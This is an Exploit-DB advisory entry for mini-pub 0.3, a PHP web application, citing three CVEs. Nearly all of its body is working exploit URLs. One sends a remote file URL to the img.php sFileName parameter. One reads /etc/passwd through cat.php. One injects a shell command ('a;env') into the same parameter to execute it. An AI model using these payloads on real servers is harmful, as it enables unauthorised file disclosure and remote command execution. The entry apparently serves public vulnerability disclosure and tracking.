mini-pub 0.3 lfd/ce Multiple Vulnerabilities

2008-10-12T00:00:00
ID EDB-ID:6733
Type exploitdb
Reporter muuratsalo
Modified 2008-10-12T00:00:00

Description

mini-pub 0.3 (LFD/CE) Multiple Remote Vulnerabilities. CVE-2008-5579,CVE-2008-5580,CVE-2008-5581. Webapps exploit for php platform

                                        
                                            mini-pub 0.3 multiple vulnerabilities

download   http://sourceforge.net/projects/mini-pub/

author     muuratsalo
contact    muuratsalo[at]gmail.com

exploits
1. local file disclosure
http://localhost/mini-pub.php/front-end/img.php?sFileName=http://site.com/cmd.txt?

2. local file disclosure
http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd

3. command execution
http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv

# milw0rm.com [2008-10-12]